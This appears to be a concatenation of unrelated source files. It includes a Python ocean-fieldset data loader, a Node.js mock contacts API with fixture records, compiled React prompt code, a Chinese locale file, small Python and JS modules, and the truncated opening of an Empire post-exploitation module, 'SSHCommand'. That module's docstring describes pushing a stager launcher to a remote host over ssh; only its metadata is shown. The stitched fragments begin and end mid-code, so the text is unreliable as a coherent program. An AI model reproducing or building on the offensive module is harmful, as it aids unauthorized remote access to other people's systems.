            # Advance the shared grid only once, even if several fields
            # reference it.
            g = f.grid
            advance2 = g.advancetime(gnew)
            if advance2*advance < 0:
                raise RuntimeError("Some Fields of the Fieldset are advanced forward and other backward")
            advance = advance2
            gnew.advanced = True
        f.advancetime(fnew, advance == 1)
def computeTimeChunk(self, time, dt):
    """Load or advance the deferred-loaded time chunks of all fields.

    :param time: current simulation time
    :param dt: timestep; its sign gives the direction of time
    :return: the next time at which new data must be loaded, or a time
        aligned to it in whole steps of dt
    """
    signdt = np.sign(dt)
    # np.inf replaces the np.infty alias, which was removed in NumPy 2.0.
    nextTime = np.inf if dt > 0 else -np.inf
    for g in self.gridset.grids:
        g.update_status = 'not_updated'
    for f in self.fields:
        if isinstance(f, VectorField) or not f.grid.defer_load:
            continue
        if f.grid.update_status == 'not_updated':
            nextTime_loc = f.grid.computeTimeChunk(f, time, signdt)
            nextTime = min(nextTime, nextTime_loc) if signdt >= 0 else max(nextTime, nextTime_loc)
    # load in new data
    for f in self.fields:
        if isinstance(f, VectorField) or not f.grid.defer_load or f.is_gradient or f.dataFiles is None:
            continue
        g = f.grid
        if g.update_status == 'first_updated':  # First load of data
            data = np.empty((g.tdim, g.zdim, g.ydim-2*g.meridional_halo, g.xdim-2*g.zonal_halo), dtype=np.float32)
            f.loaded_time_indices = range(3)
            for tind in f.loaded_time_indices:
                data = f.computeTimeChunk(data, tind)
            f.data = f.reshape(data)
        elif g.update_status == 'updated':
            data = np.empty((g.tdim, g.zdim, g.ydim-2*g.meridional_halo, g.xdim-2*g.zonal_halo), dtype=np.float32)
            if signdt >= 0:
                # Shift the 3-slot time buffer backward and load the new last slot.
                f.data[:2, :] = f.data[1:, :]
                f.loaded_time_indices = [2]
            else:
                f.data[1:, :] = f.data[:2, :]
                f.loaded_time_indices = [0]
            data = f.computeTimeChunk(data, f.loaded_time_indices[0])
            f.data[f.loaded_time_indices[0], :] = f.reshape(data)[f.loaded_time_indices[0], :]
        else:
            f.loaded_time_indices = []
        # do built-in computations on data
        for tind in f.loaded_time_indices:
            if f._scaling_factor:
                f.data[tind, :] *= f._scaling_factor
            # NaNs and out-of-range values are zeroed, not clipped —
            # presumably to mask invalid/land cells; confirm against Field.
            f.data[tind, :] = np.where(np.isnan(f.data[tind, :]), 0, f.data[tind, :])
            if f.vmin is not None:
                f.data[tind, :] = np.where(f.data[tind, :] < f.vmin, 0, f.data[tind, :])
            if f.vmax is not None:
                f.data[tind, :] = np.where(f.data[tind, :] > f.vmax, 0, f.data[tind, :])
            if f.gradientx is not None:
                f.gradient(update=True, tindex=tind)
    # do user-defined computations on fieldset data
    if self.compute_on_defer:
        self.compute_on_defer(self)
    if abs(nextTime) == np.inf or np.isnan(nextTime):  # Second happens when dt=0
        return nextTime
    else:
        nSteps = int((nextTime - time) / dt)
        if nSteps == 0:
            return nextTime
        else:
            return time + nSteps * dt
|
'use strict';
exports.getContacts = function (req, res, next) {
//var getContacts = function(){
var data = [
{
"id": 10238,
"name": "Marc Barnes",
"email": "[email protected]",
"username": "MarcBarnes",
"contact": "(382) 122-5003"
},
{
"id": 10243,
"name": "Glen Curtis",
"email": "[email protected]",
"username": "GlenCurtis",
"contact": "(477) 981-4948"
},
{
"id": 10248,
"name": "Beverly Gonzalez",
"email": "[email protected]",
"username": "BeverlyGonzalez",
"contact": "(832) 255-5161"
},
{
"id": 10253,
"name": "Yvonne Chavez",
"email": "[email protected]",
"username": "YvonneChavez",
"contact": "(477) 446-3715"
},
{
"id": 10234,
"name": "Melinda Mitchelle",
"email": "[email protected]",
"username": "MelindaMitchelle",
"contact": "(813) 716-4996"
},
{
"id": 10239,
"name": "Shannon Bradley",
"email": "[email protected]",
"username": "ShannonBradley",
"contact": "(774) 291-9928"
},
{
"id": 10244,
"name": "Virgil Kim",
"email": "[email protected]",
"username": "VirgilKim",
"contact": "(219) 181-7898"
},
{
"id": 10249,
"name": "Letitia Robertson",
"email": "[email protected]",
"username": "Letitia Robertson",
"contact": "(647) 209-4589"
},
{
"id": 10237,
"name": "Claude King",
"email": "[email protected]",
"username": "ClaudeKing",
"contact": "(657) 988-8701"
},
{
"id": 10242,
"name": "Roland Craig",
"email": "[email protected]",
"username": "RolandCraig",
"contact": "(932) 935-9471"
},
{
"id": 10247,
"name": "Colleen Parker",
"email": "[email protected]",
"username": "ColleenParker",
"contact": "(857) 459-2792"
},
{
"id": 10252,
"name": "Leah Jensen",
"email": "[email protected]",
"username": "LeahJensen",
"contact": "(861) 275-4686"
},
{
"id": 10236,
"name": "Harold Martinez",
"email": "[email protected]",
"username": "HaroldMartinez",
"contact": "(836) 634-9133"
},
{
"id": 10241,
"name": "Keith Lowe",
"email": "[email protected]",
"username": "KeithLowe",
"contact": "(778) 787-3100"
},
{
"id": 10246,
"name": "Charles Walker",
"email": "[email protected]",
"username": "CharlesWalker",
"contact": "(486) 440-4716"
},
{
"id": 10251,
"name": "Lillie Curtis",
"email": "[email protected]",
"username": "LillieCurtis",
"contact": "(342) 510-2258"
},
{
"id": 10235,
"name": "Genesis Reynolds",
"email": "[email protected]",
"username": "GenesisReynolds",
"contact": "(339) 375-1858"
},
{
"id": 10240,
"name": "Oscar Palmer",
"email": "[email protected]",
"username": "OscarPalmer",
"contact": "(544) 270-9912"
}
];
// return data;
res.send({"result": data});
};
exports.getContactDetailsById = function (req, res, next) {
var data = [
{
"id": 10238,
"name": "Marc Barnes",
"email": "[email protected]",
"username": "MarcBarnes",
"leadSource": "Impiger",
"company": "Impiger",
"title": "Mr",
"gender": "male",
"age": "31",
"primaryPhone": "3214569877",
"secondaryPhone": "7894561236",
"extension": "574",
"fax": "78451236",
"website": "http://www.arthurmurraymemorial.com/",
"street": "9746 Katy Fwy",
"city": "Hacienda Heights",
"state": "Washington",
"country": "United States",
"zipCode": "600017",
"contact": "(382) 122-5003",
"basicInformation": "1",
"contactInformation": "1",
"addressInformation": "1",
"otherInformation": "1"
},
{
"id": 10243,
"name": "Glen Curtis",
"email": "[email protected]",
"username": "GlenCurtis",
"contact": "(477)-981-4948"
},
{
"id": 10248,
"name": "Beverly Gonzalez",
"email": "[email protected]",
"username": "BeverlyGonzalez",
"contact": "(832)-255-5161"
},
{
"id": 10253,
"name": "Yvonne Chavez",
"email": "[email protected]",
"username": "YvonneChavez",
"contact": "(477)-446-3715"
},
{
"id": 10234,
"name": "Melinda Mitchelle",
"email": "[email protected]",
"username": "MelindaMitchelle",
"contact": "(813)-716-4996"
},
{
"id": 10239,
"name": "Shannon Bradley",
"email": "[email protected]",
"username": "ShannonBradley",
"contact": "(774)-291-9928"
},
{
"id": 10244,
"name": "Virgil Kim",
"email": "[email protected]",
"username": "VirgilKim",
"contact": "(219)-181-7898"
},
{
"id": 10249,
"name": "Letitia Robertson",
"email": "[email protected]",
"username": "Letitia Robertson",
"contact": "(647)-209-4589"
},
{
"id": 10237,
"name": "Claude King",
"email": "[email protected]",
"username": "ClaudeKing",
"contact": "(657)-988-8701"
},
{
"id": 10242,
"name": "Roland Craig",
"email": "[email protected]",
"username": "RolandCraig",
"contact": "(932)-935-9471"
},
{
"id": 10247,
"name": "Colleen Parker",
"email": "[email protected]",
"username": "ColleenParker",
"contact": "(857)-459-2792"
},
{
"id": 10252,
"name": "Leah Jensen",
"email": "[email protected]",
"username": "LeahJensen",
"contact": "(861)-275-4686"
},
{
"id": 10236,
"name": "Harold Martinez",
"email": "[email protected]",
"username": "HaroldMartinez",
"contact": "(836)-634-9133"
},
{
"id": 10241,
"name": "Keith Lowe",
"email": "[email protected]",
"username": "KeithLowe",
"contact": "(778)-787-3100"
},
{
"id": 10246,
"name": "Charles Walker",
"email": "[email protected]",
"username": "CharlesWalker",
"contact": "(486)-440-4716"
},
{
"id": 10251,
"name": "Lillie Curtis",
"email": "[email protected]",
"username": "LillieCurtis",
"contact": "(342)-510-2258"
},
{
"id": 10235,
"name": "Genesis Reynolds",
"email": "[email protected]",
"username": "GenesisReynolds",
"contact": "(339)-375-1858"
},
{
"id": 10240,
"name": "Oscar Palmer",
"email": "[email protected]",
"username": "OscarPalmer",
"contact": "(544)-270-9912"
}
];
var result = getDetails(data, id);
// return result;
res.send({"result": result});
};
// GET handler stub: returns detail fields for a single (mock) contact record.
// NOTE(review): hard-coded fixture data; the id-based lookup is commented out
// below and the first (only) record is always returned — confirm intended.
exports.getContactsDetails = function (req, res, next) {
  // Single fixture record combining lead, contact and listing information.
  var data = [
    {
      "leadSource": "Impiger",
      "company": "Glencove",
      "title": "Mr",
      "name": "Jenchun Wu",
      "gender": "male",
      "age": "35",
      "primaryPhone": "17134681628",
      "secondaryPhone": "17134681627",
      "extension": "123",
      "email": "[email protected]",
      "fax": "123123",
      "website": "http://www.arthurmurraymemorial.com/",
      "street": "9746 Katy Fwy",
      "city": "Hacienda Heights",
      "state": "Ca",
      "country": "US",
      "zipCode": "77055",
      "listed": "06/16/15",
      "dom": "183",
      "areaName": "Hacienda Heights",
      "propertyType": "Single Family Residence",
      "office": "IRN Realty",
      "listAgent": "Lazar Chang",
      "offMarket": "12/15/15",
      "listPrice": "$932,558",
      "status": "Expired",
      "mlslistingID": "TR15131807",
      "prevStatusDate": "06/18/15",
      "prevStatus": "Active",
      "mlsid": "8241-002-042"
      // "basicInformation": "1",
      // "contactInformation": "1",
      // "addressInformation": "1",
      // "otherInformation": "1"
    }
  ];
  // var result = getDetails(data[i], id);
  // return data[0];
  // Always respond with the single fixture record.
  res.send({"result": data[0]});
};
/**
 * Find the first record whose `id` matches the given id.
 *
 * The comparison is intentionally loose (`==`): ids typically arrive as
 * strings from request parameters while the fixture data stores numbers.
 *
 * @param {Array<Object>} data - Collection of records, each with an `id`.
 * @param {(number|string)} id - Identifier to look up.
 * @returns {(Object|undefined)} The matching record, or undefined when absent.
 */
var getDetails = function (data, id) {
  return data.find(function (record) {
    // eslint-disable-next-line eqeqeq -- loose match across string/number ids
    return record.id == id;
  });
};
exports.updateContactById = function (req, res, next) {
// var id = data.id;
// Do update operation
// return true;
res.send({"result": true});
};
exports.deleteContactById = function (req, res, next) {
// var id = data.id;
// Do update operation
// return true;
res.send({"result": true});
};
exports.deleteLeadById = function (req, res, next) {
// var id = data.id;
// Do update operation
res.send({"result": true});
};
/**
 * GET handler: returns the full (mock) list of leads.
 * NOTE(review): hard-coded fixture data; some records carry a "username"
 * field and others do not — confirm whether that asymmetry is intended.
 */
exports.getLeads = function (req, res, next) {
  var data = [
    {
      "id": 10247,
      "name": "Marc Barnes",
      "email": "[email protected]",
      "contact": "(382) 122-5003"
    },
    {
      "id": 10248,
      "name": "Glen Curtis",
      "email": "[email protected]",
      "contact": "(477) 981-4948"
    },
    {
      "id": 10249,
      "name": "Beverly Gonzalez",
      "email": "[email protected]",
      "contact": "(832) 255-5161"
    },
    {
      "id": 10250,
      "name": "Yvonne Chavez",
      "email": "[email protected]",
      "contact": "(477) 446-3715"
    },
    {
      "id": 10251,
      "name": "Melinda Mitchelle",
      "email": "[email protected]",
      "contact": "(813) 716-4996"
    },
    {
      "id": 10252,
      "name": "Shannon Bradley",
      "email": "[email protected]",
      "contact": "(774) 291-9928"
    },
    // Records from here through id 10264 also include a "username".
    {
      "id": 10253,
      "name": "Virgil Kim",
      "email": "[email protected]",
      "username": "VirgilKim",
      "contact": "(219) 181-7898"
    },
    {
      "id": 10254,
      "name": "Letitia Robertson",
      "email": "[email protected]",
      "username": "Letitia Robertson",
      "contact": "(647) 209-4589"
    },
    {
      "id": 10255,
      "name": "Claude King",
      "email": "[email protected]",
      "username": "ClaudeKing",
      "contact": "(657) 988-8701"
    },
    {
      "id": 10256,
      "name": "Roland Craig",
      "email": "[email protected]",
      "username": "RolandCraig",
      "contact": "(932) 935-9471"
    },
    {
      "id": 10257,
      "name": "Colleen Parker",
      "email": "[email protected]",
      "username": "ColleenParker",
      "contact": "(857) 459-2792"
    },
    {
      "id": 10258,
      "name": "Leah Jensen",
      "email": "[email protected]",
      "username": "LeahJensen",
      "contact": "(861) 275-4686"
    },
    {
      "id": 10259,
      "name": "Harold Martinez",
      "email": "[email protected]",
      "username": "HaroldMartinez",
      "contact": "(836) 634-9133"
    },
    {
      "id": 10260,
      "name": "Keith Lowe",
      "email": "[email protected]",
      "username": "KeithLowe",
      "contact": "(778) 787-3100"
    },
    {
      "id": 10261,
      "name": "Charles Walker",
      "email": "[email protected]",
      "username": "CharlesWalker",
      "contact": "(486) 440-4716"
    },
    {
      "id": 10262,
      "name": "Lillie Curtis",
      "email": "[email protected]",
      "username": "LillieCurtis",
      "contact": "(342) 510-2258"
    },
    {
      "id": 10263,
      "name": "Genesis Reynolds",
      "email": "[email protected]",
      "username": "GenesisReynolds",
      "contact": "(339) 375-1858"
    },
    {
      "id": 10264,
      "name": "Oscar Palmer",
      "email": "[email protected]",
      "username": "OscarPalmer",
      "contact": "(544) 270-9912"
    },
    {
      "id": 10265,
      "name": "Lillie Lead",
      "email": "[email protected]",
      "contact": "(342) 510-2258"
    },
    {
      "id": 10266,
      "name": "Genesis Lead",
      "email": "[email protected]",
      "contact": "(339) 375-1858"
    },
    {
      "id": 10267,
      "name": "Oscar Lead",
      "email": "[email protected]",
      "contact": "(544) 270-9912"
    },
    {
      "id": 10268,
      "name": "Lena Lead",
      "email": "[email protected]",
      "contact": "(177) 521-1556"
    },
    {
      "id": 10269,
      "name": "Kent Lead",
      "email": "[email protected]",
      "contact": "(506) 533-6801"
    }
  ];
  // return data;
  res.send({"result": data});
};
//module.exports.x = x;
//module.exports.addX = addX;
////module.exports.getContacts = getContacts;
//module.exports.getContactDetailsById = getContactDetailsById;
//module.exports.updateContactById = updateContactById;
//module.exports.getContactsDetails = getContactsDetails;
//module.exports.deleteContactById = deleteContactById;
//module.exports.deleteLeadById = deleteLeadById;
//module.exports.getLeads = getLeads; |
// Barrel module: re-export the default export of SubjectSetStore so
// consumers can import it from this directory.
export { default } from './SubjectSetStore'
"use strict";
require("core-js/modules/es.array.iterator.js");
require("core-js/modules/es.weak-map.js");
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.ChoicesComponent = ChoicesComponent;
exports.choices = choices;
var _react = _interopRequireWildcard(require("react"));
var _helpers = require("../../_helpers");
var _choicesList = require("./components/choices-list");
var _useChoicesNavigation = require("./use-choices-navigation");
var _useNumericInputHandler = require("./use-numeric-input-handler");
// Babel helper (generated): lazily creates the two WeakMap caches used by
// _interopRequireWildcard, picking one based on the nodeInterop flag.
function _getRequireWildcardCache(nodeInterop) { if (typeof WeakMap !== "function") return null; var cacheBabelInterop = new WeakMap(); var cacheNodeInterop = new WeakMap(); return (_getRequireWildcardCache = function _getRequireWildcardCache(nodeInterop) { return nodeInterop ? cacheNodeInterop : cacheBabelInterop; })(nodeInterop); }
// Babel helper (generated): wraps a CommonJS module so `import * as ns`
// behaves like an ES module namespace — copies own properties (preserving
// getters/setters), sets .default, and memoizes results in the WeakMap cache.
function _interopRequireWildcard(obj, nodeInterop) { if (!nodeInterop && obj && obj.__esModule) { return obj; } if (obj === null || typeof obj !== "object" && typeof obj !== "function") { return { default: obj }; } var cache = _getRequireWildcardCache(nodeInterop); if (cache && cache.has(obj)) { return cache.get(obj); } var newObj = {}; var hasPropertyDescriptor = Object.defineProperty && Object.getOwnPropertyDescriptor; for (var key in obj) { if (key !== "default" && Object.prototype.hasOwnProperty.call(obj, key)) { var desc = hasPropertyDescriptor ? Object.getOwnPropertyDescriptor(obj, key) : null; if (desc && (desc.get || desc.set)) { Object.defineProperty(newObj, key, desc); } else { newObj[key] = obj[key]; } } } newObj.default = obj; if (cache) { cache.set(obj, newObj); } return newObj; }
/**
 * Interactive list-of-choices component (compiled output).
 *
 * Renders an optional question message plus the choices list, and wires up:
 *  - highlight navigation via useChoicesNavigation (tracks highlightedItem),
 *  - an Enter-key handler that submits the highlighted item's value,
 *  - optional numeric shortcut input when isNumericInputEnabled is set.
 */
function ChoicesComponent({
  message,
  isNumericInputEnabled,
  items,
  onSubmit
}) {
  const highlightedItem = (0, _useChoicesNavigation.useChoicesNavigation)(items);
  // Submit the currently highlighted item (triggered by the Enter key).
  const submitResult = (0, _react.useCallback)(() => {
    onSubmit(highlightedItem.value);
  }, [highlightedItem, onSubmit]);
  // Submit an item chosen via its numeric shortcut; no-op when disabled.
  const handleNumericInput = (0, _react.useCallback)(item => {
    if (!isNumericInputEnabled) {
      return;
    }
    onSubmit(item.value);
  }, [isNumericInputEnabled, onSubmit]);
  (0, _helpers.useEnterKeyHandler)(submitResult);
  (0, _useNumericInputHandler.useNumericInputHandler)({
    items,
    onNumericInput: handleNumericInput
  });
  // Question line is rendered only when a message was provided.
  return /*#__PURE__*/_react.default.createElement(_react.default.Fragment, null, message && /*#__PURE__*/_react.default.createElement(_helpers.Question, {
    message: message
  }), /*#__PURE__*/_react.default.createElement(_choicesList.ChoicesList, {
    items: items,
    highlightedItem: highlightedItem,
    isNumericInputEnabled: isNumericInputEnabled
  }));
}
/**
 * Factory for a choices prompt.
 *
 * Validates the configuration and returns a render function that, given an
 * onSubmit callback, produces the ChoicesComponent element.
 * Throws when numeric input is enabled with more than 9 items (shortcuts
 * are single digits).
 */
function choices({
  message,
  isNumericInputEnabled = false,
  items
}) {
  const tooManyForNumericInput = isNumericInputEnabled && items.length > 9;
  if (tooManyForNumericInput) {
    throw new Error('If isNumericInputEnabled is true, the length of choices must be less than 10');
  }
  return function render(onSubmit) {
    return /*#__PURE__*/_react.default.createElement(ChoicesComponent, {
      message: message,
      isNumericInputEnabled: isNumericInputEnabled,
      items: items,
      onSubmit: onSubmit
    });
  };
}
// import zhMessages from '../../locales/zh.json';
// Simplified Chinese locale messages.
// Keys are dot-namespaced message ids consumed by the i18n layer; values are
// the displayed translations. Key order is preserved as-is since object key
// order is observable in JavaScript.
export default {
  'navbar.lang': 'English',
  // Navigation menu entries
  'menu.home': '首页',
  'menu.dashboard': '本站新闻',
  'menu.dashboard.analysis': '公告',
  'menu.dashboard.monitor': '消息',
  'menu.dashboard.workplace': '个人资料',
  'menu.form': '我的课程',
  'menu.course': '课程详情',
  'menu.course.grade': '评分',
  'menu.course.courseDetail': '课程详情',
  'menu.form.basicform': '2018年秋季',
  'menu.form.stepform': '2018年春季',
  'menu.form.stepform.info': '分步表单(填写转账信息)',
  'menu.form.stepform.confirm': '分步表单(确认转账信息)',
  'menu.form.stepform.result': '分步表单(完成)',
  'menu.form.advancedform': '2017年秋季',
  'menu.form.addCourse': '添加课程',
  'menu.form.testform': '测试',
  'menu.manage-course': '课程管理',
  'menu.manage-course.addCourse': '添加课程',
  'menu.manage-course.myClass': '我的班级',
  'menu.manage-course.manageCourse': '课程管理',
  'menu.managerUser':'用户管理',
  'menu.list': '列表页',
  'menu.list.searchtable': '查询表格',
  'menu.list.basiclist': '标准列表',
  'menu.list.cardlist': '卡片列表',
  'menu.list.searchlist': '搜索列表',
  'menu.list.searchlist.articles': '搜索列表(文章)',
  'menu.list.searchlist.projects': '搜索列表(项目)',
  'menu.list.searchlist.applications': '搜索列表(应用)',
  'menu.profile': '详情页',
  'menu.profile.basic': '基础详情页',
  'menu.profile.advanced': '高级详情页',
  'menu.result': '结果页',
  'menu.result.success': '成功页',
  'menu.result.fail': '失败页',
  'menu.exception': '异常页',
  'menu.exception.not-permission': '403',
  'menu.exception.not-find': '404',
  'menu.exception.server-error': '500',
  'menu.exception.trigger': '触发错误',
  'menu.account': '个人页',
  'menu.account.settings': '设置',
  'menu.account.center': '个人中心',
  'menu.account.discuss': '讨论区帖子',
  'menu.account.detail': '帖子详情',
  'menu.account.trigger': '触发报错',
  'menu.account.analysis': '消息',
  'menu.compiler': '在线编译',
  // Analysis dashboard strings
  'app.home.introduce': '介绍',
  'app.analysis.test': '工专路 {no} 号店',
  'app.analysis.introduce': '指标说明',
  'app.analysis.total-sales': '总销售额',
  'app.analysis.day-sales': '日销售额',
  'app.analysis.visits': '访问量',
  'app.analysis.visits-trend': '访问量趋势',
  'app.analysis.visits-ranking': '门店访问量排名',
  'app.analysis.day-visits': '日访问量',
  'app.analysis.week': '周同比',
  'app.analysis.day': '日同比',
  'app.analysis.payments': '支付笔数',
  'app.analysis.conversion-rate': '转化率',
  'app.analysis.operational-effect': '运营活动效果',
  'app.analysis.sales-trend': '销售趋势',
  'app.analysis.sales-ranking': '门店销售额排名',
  'app.analysis.all-year': '全年',
  'app.analysis.all-month': '本月',
  'app.analysis.all-week': '本周',
  'app.analysis.all-day': '今日',
  'app.analysis.search-users': '搜索用户数',
  'app.analysis.per-capita-search': '人均搜索次数',
  'app.analysis.online-top-search': '线上热门搜索',
  'app.analysis.the-proportion-of-sales': '销售额类别占比',
  'app.analysis.channel.all': '全部渠道',
  'app.analysis.channel.online': '线上',
  'app.analysis.channel.stores': '门店',
  'app.analysis.sales': '销售额',
  'app.analysis.traffic': '客流量',
  'app.analysis.table.rank': '排名',
  'app.analysis.table.search-keyword': '搜索关键词',
  'app.analysis.table.users': '用户数',
  'app.analysis.table.weekly-range': '周涨幅',
  // Account settings page
  'app.settings.menuMap.basic': '基本设置',
  'app.settings.menuMap.security': '安全设置',
  'app.settings.menuMap.binding': '账号绑定',
  'app.settings.menuMap.notification': '新消息通知',
  'app.settings.basic.avatar': '更换头像',
  'app.settings.basic.email': '邮箱',
  'app.settings.basic.email-message': '请输入您的邮箱!',
  'app.settings.basic.nickname': '昵称',
  'app.settings.basic.nickname-message': '请输入您的昵称!',
  'app.settings.basic.profile': '个人简介',
  'app.settings.basic.profile-message': '请输入个人简介!',
  'app.settings.basic.profile-placeholder': '个人简介',
  'app.settings.basic.country': '国家/地区',
  'app.settings.basic.country-message': '请输入您的国家或地区!',
  'app.settings.basic.geographic': '所在省市',
  'app.settings.basic.geographic-message': '请输入您的所在省市!',
  'app.settings.basic.address': '街道地址',
  'app.settings.basic.address-message': '请输入您的街道地址!',
  'app.settings.basic.phone': '联系电话',
  'app.settings.basic.phone-message': '请输入您的联系电话!',
  'app.settings.basic.update': '更新基本信息',
  'app.settings.security.strong': '强',
  'app.settings.security.medium': '中',
  'app.settings.security.weak': '弱',
  'app.settings.security.password': '账户密码',
  'app.settings.security.password-description': '当前密码强度:',
  'app.settings.security.phone': '密保手机',
  'app.settings.security.phone-description': '已绑定手机:',
  'app.settings.security.question': '密保问题',
  'app.settings.security.question-description': '未设置密保问题,密保问题可有效保护账户安全',
  'app.settings.security.email': '备用邮箱',
  'app.settings.security.email-description': '已绑定邮箱:',
  'app.settings.security.mfa': 'MFA 设备',
  'app.settings.security.mfa-description': '未绑定 MFA 设备,绑定后,可以进行二次确认',
  'app.settings.security.modify': '修改',
  'app.settings.security.set': '设置',
  'app.settings.security.bind': '绑定',
  'app.settings.binding.taobao': '绑定淘宝',
  'app.settings.binding.taobao-description': '当前未绑定淘宝账号',
  'app.settings.binding.alipay': '绑定支付宝',
  'app.settings.binding.alipay-description': '当前未绑定支付宝账号',
  'app.settings.binding.dingding': '绑定钉钉',
  'app.settings.binding.dingding-description': '当前未绑定钉钉账号',
  'app.settings.binding.bind': '绑定',
  'app.settings.notification.password': '账户密码',
  'app.settings.notification.password-description': '其他用户的消息将以站内信的形式通知',
  'app.settings.notification.messages': '系统消息',
  'app.settings.notification.messages-description': '系统消息将以站内信的形式通知',
  'app.settings.notification.todo': '账户密码',
  'app.settings.notification.todo-description': '账户密码',
  'app.settings.open': '开',
  'app.settings.close': '关',
  // Exception / result pages
  'app.exception.back': '返回首页',
  'app.exception.description.403': '抱歉,你无权访问该页面',
  'app.exception.description.404': '抱歉,你访问的页面不存在',
  'app.exception.description.500': '抱歉,服务器出错了',
  'app.result.error.title': '提交失败',
  'app.result.error.description': '请核对并修改以下信息后,再重新提交。',
  'app.result.error.hint-title': '您提交的内容有如下错误:',
  'app.result.error.hint-text1': '您的账户已被冻结',
  'app.result.error.hint-btn1': '立即解冻',
  'app.result.error.hint-text2': '您的账户还不具备申请资格',
  'app.result.error.hint-btn2': '立即升级',
  'app.result.error.btn-text': '返回修改',
  'app.result.success.title': '提交成功',
  'app.result.success.description':
    '提交结果页用于反馈一系列操作任务的处理结果, 如果仅是简单操作,使用 Message 全局提示反馈即可。 本文字区域可以展示简单的补充说明,如果有类似展示 “单据”的需求,下面这个灰色区域可以呈现比较复杂的内容。',
  'app.result.success.operate-title': '项目名称',
  'app.result.success.operate-id': '项目 ID:',
  'app.result.success.principal': '负责人:',
  'app.result.success.operate-time': '生效时间:',
  'app.result.success.step1-title': '创建项目',
  'app.result.success.step1-operator': '曲丽丽',
  'app.result.success.step2-title': '部门初审',
  'app.result.success.step2-operator': '周毛毛',
  'app.result.success.step2-extra': '催一下',
  'app.result.success.step3-title': '财务复核',
  'app.result.success.step4-title': '完成',
  'app.result.success.btn-return': '返回列表',
  'app.result.success.btn-project': '查看项目',
  'app.result.success.btn-print': '打印',
  // Theme / layout settings drawer
  'app.setting.pagestyle': '整体风格设置',
  'app.setting.pagestyle.dark': '暗色菜单风格',
  'app.setting.pagestyle.light': '亮色菜单风格',
  'app.setting.content-width': '内容区域宽度',
  'app.setting.content-width.fixed': '定宽',
  'app.setting.content-width.fluid': '流式',
  'app.setting.themecolor': '主题色',
  'app.setting.themecolor.dust': '薄暮',
  'app.setting.themecolor.volcano': '火山',
  'app.setting.themecolor.sunset': '日暮',
  'app.setting.themecolor.cyan': '明青',
  'app.setting.themecolor.green': '极光绿',
  'app.setting.themecolor.daybreak': '拂晓蓝(默认)',
  'app.setting.themecolor.geekblue': '极客蓝',
  'app.setting.themecolor.purple': '酱紫',
  'app.setting.navigationmode': '导航模式',
  'app.setting.sidemenu': '侧边菜单布局',
  'app.setting.topmenu': '顶部菜单布局',
  'app.setting.fixedheader': '固定 Header',
  'app.setting.fixedsidebar': '固定侧边菜单',
  'app.setting.fixedsidebar.hint': '侧边菜单布局时可配置',
  'app.setting.hideheader': '下滑时隐藏 Header',
  'app.setting.hideheader.hint': '固定 Header 时可配置',
  'app.setting.othersettings': '其他设置',
  'app.setting.weakmode': '色弱模式',
  'app.setting.copy': '拷贝设置',
  'app.setting.copyinfo': '拷贝成功,请到 src/defaultSettings.js 中替换默认配置',
  'app.setting.production.hint':
    '配置栏只在开发环境用于预览,生产环境不会展现,请拷贝后手动修改配置文件',
};
|
from data.fields.abstract import AbstractField
from data.scrape.fields.targets import TARGETS, GUIDELINE_TARGETS, EQUATOR_TARGET
class HasAny(AbstractField):
    """Derived boolean field: true when any of the given source fields is truthy.

    Produces a column named ``has_<name>`` (lower-cased), computed row-wise
    from the listed source field columns.
    """

    def __init__(self, name, field_names):
        # Derived column name, e.g. "EQUATOR" -> "has_equator".
        self.name = "has_" + name.lower()
        self.field_names = field_names

    def apply_to_dataframe(self, df):
        """Add the derived boolean column to ``df`` in place (row-wise apply)."""
        df[self.name] = df.apply(self.has_any, axis=1)

    def has_any(self, df):
        """Return True when any tracked field is truthy.

        ``df`` is a single row (as passed by ``DataFrame.apply(axis=1)``).
        """
        # Generator expression: short-circuits and avoids building a list.
        return any(df[name] for name in self.field_names)
# One derived "has_<target>" column per scrape target, aggregating that
# target's individual field columns into a single boolean.
POSTPROCESSED_FIELDS = [
    HasAny(target.name, [field.name for field in target.fields]) for target in TARGETS
]
# Aggregate across all EQUATOR fields.
HAS_EQUATOR = HasAny("EQUATOR", [field.name for field in EQUATOR_TARGET.fields])
# Aggregate across every field of every guideline target.
HAS_ANY_GUIDELINES = HasAny(
    "Guidelines",
    [field.name for target in GUIDELINE_TARGETS for field in target.fields],
)
POSTPROCESSED_FIELDS.append(HAS_EQUATOR)
POSTPROCESSED_FIELDS.append(HAS_ANY_GUIDELINES)
|
/**
* Created by kras on 27.12.16.
*/
'use strict';
/**
 * Abstract repository of report metadata.
 *
 * Every public method delegates to an underscore-prefixed hook (_init,
 * _getDataMines, ...) that a concrete subclass is expected to provide.
 */
function ReportMetaRepository() {
  /**
   * Initialize the repository.
   * @returns {Promise}
   */
  this.init = function () {
    return this._init();
  };

  /**
   * List data mines, optionally filtered by namespace.
   * @param {String} [namespace]
   * @returns {DataMine[]}
   */
  this.getDataMines = function (namespace) {
    return this._getDataMines(namespace);
  };

  /**
   * Look up a single data mine by name.
   * @param {String} name
   * @param {String} [namespace]
   * @returns {DataMine | null}
   */
  this.getDataMine = function (name, namespace) {
    return this._getDataMine(name, namespace);
  };

  /**
   * List navigation nodes under the given parent.
   * Result shape is defined by the concrete implementation.
   * @param {String} parent
   * @param {String} [namespace]
   */
  this.getNavigationNodes = function (parent, namespace) {
    return this._getNavigationNodes(parent, namespace);
  };

  /**
   * Look up a navigation node by its code.
   * @param {String} code
   * @param {String} [namespace]
   */
  this.getNavigationNode = function (code, namespace) {
    return this._getNavigationNode(code, namespace);
  };
}

module.exports = ReportMetaRepository;
|
from __future__ import print_function
from builtins import object
from lib.common import helpers
class Module(object):
    """Empire module: deliver a Python stager launcher to a remote host via SSH.

    ``generate`` builds a Python 2 script that forks an ssh client on a pty,
    answers the password prompt, and runs the launcher on the remote side.
    NOTE(review): indentation in this file was reconstructed from a
    whitespace-mangled source; verify nesting against the original module.
    """

    def __init__(self, mainMenu, params=[]):
        # NOTE(review): mutable default `params=[]` is shared across calls;
        # harmless here because it is only iterated, never mutated.
        # metadata info about the module, not modified during runtime
        self.info = {
            # name for the module that will appear in module menus
            'Name': 'SSHCommand',

            # list of one or more authors for the module
            'Author': ['@424f424f'],

            # more verbose multi-line description of the module
            'Description': 'This module will send an launcher via ssh.',

            # True if the module needs to run in the background
            'Background' : True,

            # File extension to save the file as
            'OutputExtension' : "",

            # if the module needs administrative privileges
            'NeedsAdmin' : False,

            # True if the method doesn't touch disk/is reasonably opsec safe
            'OpsecSafe' : True,

            # the module language
            'Language' : 'python',

            # the minimum language version needed
            'MinLanguageVersion' : '2.6',

